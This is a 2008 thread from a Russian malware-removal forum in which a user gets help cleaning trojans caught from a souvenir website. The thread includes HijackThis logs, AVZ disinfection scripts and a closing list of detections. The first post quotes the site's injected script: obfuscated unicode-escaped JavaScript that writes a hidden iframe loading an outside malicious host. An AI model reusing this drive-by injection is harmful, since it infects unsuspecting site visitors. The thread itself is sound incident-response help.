Поймал трояна с сайта

Printable View

21.05.2008, 16:33
Ивпал

Поймал трояна с сайта

На совершенно мирном сувенирном сайте kaleidoscope поймал за хвост трояна:

</body>
</html>

<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u006d\u0065\u0064\u0069\u0061\u0067\u0072\u006f\u0075\u0070\u002e\u0063\u006f\u006d\u002f\u0074\u0073\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0079\u0061\u0068\u006f\u006f\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>

А теперь никак не вычищу. :(
21.05.2008, 16:40
Гриша

Отключите антивирус и интернет!

[URL="http://virusinfo.info/showthread.php?t=4491"]Пофиксить[/URL]

[CODE]O4 - HKLM\..\Run: [runwinlogon] C:\WINDOWS\winlogon.exe
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spools.exe
O4 - HKLM\..\Run: [autoload] C:\Documents and Settings\Ekimenkov\cftmon.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spools.exe
O4 - HKCU\..\Run: [autoload] C:\Documents and Settings\Ekimenkov\cftmon.exe
O4 - HKUS\S-1-5-18\..\Run: [herjek] C:\WINDOWS\herjek.exe (User 'SYSTEM')
O16 - DPF: {BD11A280-2E73-11CF-B6CF-00AA00A74DAE} - file://C:\Info_sex4.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CCS\Services\Tcpip\..\{5F9689F3-E406-4B7B-AAF1-FC4D14AF8982}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CCS\Services\Tcpip\..\{62D3B7E4-334B-4070-B638-1FBF021DAFAD}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
O17 - HKLM\System\CS2\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CS3\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
O17 - HKLM\System\CS3\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106[/CODE]

[URL="http://virusinfo.info/showthread.php?t=7239"]AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".[/URL]

[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('kdeed.exe','');
QuarantineFile('C:\WINDOWS\winlogon.exe','');
QuarantineFile('C:\WINDOWS\herjek.exe','');
QuarantineFile('C:\Documents and Settings\LocalService\cftmon.exe','');
QuarantineFile('C:\Documents and Settings\Ekimenkov\cftmon.exe','');
QuarantineFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe','');
QuarantineFile('c:\windows\system32\drivers\spools.exe','');
TerminateProcessByName('c:\windows\system32\drivers\spools.exe');
DeleteService('Bgib46');
DeleteService('Schedule');
DeleteService('Google Online Services');
DeleteFile('C:\WINDOWS\system32\kdeed.exe');
DeleteFile('c:\windows\system32\drivers\spools.exe');
DeleteFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe');
DeleteFile('C:\Documents and Settings\Ekimenkov\cftmon.exe');
DeleteFile('C:\Documents and Settings\LocalService\cftmon.exe');
DeleteFile('C:\WINDOWS\herjek.exe');
DeleteFile('C:\WINDOWS\winlogon.exe');
DeleteFile('kdeed.exe');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteRepair(1 );
RebootWindows(true);
end.[/CODE]

После выполнения скрипта компьютер перезагрузится.
Прислать карантин согласно приложения 3 правил .
Загружать по ссылке:[url]http://virusinfo.info/upload_virus.php?tid=23176[/url]

AVZ => Файл => Мастер поиска и устранения проблем. Категория проблемы - поставьте "Системные проблемы", степень опасности - "Все проблемы". Нажмите "Пуск". Всё найденное следует пометить и пофиксить. Данную операцию повторить для категории "Настройки и твики браузера".

Это лакомый кусочек для зверей:

[CODE]Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)[/CODE]

Нужно срочно обновить систему,иначе вы у нас надолго.

Повторите логи.
21.05.2008, 17:28
Ивпал

Да уж, вот это куча... >:(
Все пофиксил-поскриптил.
Карантин выслал.
Логи повторил.

[B]Но DrWEB всё равно определяет наличие Trojan.MulDrop.15170 и Downloader.60042[/B]

[quote=Гриша;229778]Это лакомый кусочек для зверей:

[code]Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)[/code]

Нужно срочно обновить систему, иначе вы у нас надолго.[/quote]

А до какой степени посоветуете обновить? До SP3?
21.05.2008, 17:37
Гриша

Доктора отключить!

[URL="http://virusinfo.info/showthread.php?t=7239"]AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".[/URL]

[CODE]begin
ClearQuarantine;
SearchRootkit(true, true);
SetAVZGuardStatus(True);
DeleteService('Bgib46');
DeleteService('Google Online Services');
DeleteService('Schedule');
DeleteFile('C:\WINDOWS\system32\drivers\spools.exe');
DeleteFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe');
BC_ImportDeletedList;
ExecuteSysClean;
BC_DeleteSvc('Bgib46 ');
BC_DeleteSvc('Google Online Services ');
BC_DeleteSvc('Schedule ');
BC_Activate;
RebootWindows(true);
end.[/CODE]

Обновите базы AVZ и повторите все логи.Обновиться лучше до SP3
21.05.2008, 18:34
Ивпал

Скрипт выполнил.

При получении логов AVZ выловил еще [B]Trojan-Spy.Webmoner[/B]
Возможно, это связано с тем, что перед этим я по Вашему совету обновил базы AVZ.

Логи прилагаю.
21.05.2008, 18:39
Гриша

Хорошо прижились даже уходить не хотят :)

[URL="http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip"]Скачайте[/URL],меню,File,появится аналог проводника,найти:

[CODE]C:\WINDOWS\system32\drivers\spools.exe
C:\Documents and Settings\Ekimenkov\ie_updates3r.exe[/CODE]

Правая кнопка мыши Force Delete на запрос о перезагрузке ответьте положительно.

Затем скрипт из поста №4 [url]http://virusinfo.info/showpost.php?p=229826&postcount=4[/url]
21.05.2008, 19:22
Ивпал

Похоже, мы его всё-таки выдавили :D

И Айс уже не понадобился (в том смысле, что он уже не нашел следов ie_updates3r.exe). Вероятно, это я пристегнул какие-то старые логи.

Спасибо!
22.02.2009, 05:24
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]15[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\\documents and settings\\ekimenkov\\cftmon.exe - [B]Trojan-Downloader.Win32.BHO.hh[/B] (DrWEB: Trojan.DownLoader.62008)[*] c:\\documents and settings\\ekimenkov\\ie_updates3r.exe - [B]Trojan-Downloader.Win32.Winlagons.jl[/B] (DrWEB: Trojan.DownLoader.based)[*] c:\\documents and settings\\localservice\\cftmon.exe - [B]Trojan-Downloader.Win32.BHO.hh[/B] (DrWEB: Trojan.DownLoader.62008)[*] c:\\windows\\herjek.exe - [B]Email-Worm.Win32.Zhelatin.zb[/B] (DrWEB: Trojan.Packed.468)[*] c:\\windows\\system32\\drivers\\spools.exe - [B]Trojan-Downloader.Win32.BHO.hh[/B] (DrWEB: Trojan.DownLoader.62008)[*] c:\\windows\\system32\\kdeed.exe - [B]Trojan.Win32.Monder.gen[/B] (DrWEB: Trojan.Virtumod.based.14)[*] c:\\windows\\winlogon.exe - [B]Trojan-Proxy.Win32.Small.ou[/B] (DrWEB: Trojan.Packed.573)[/LIST][/LIST]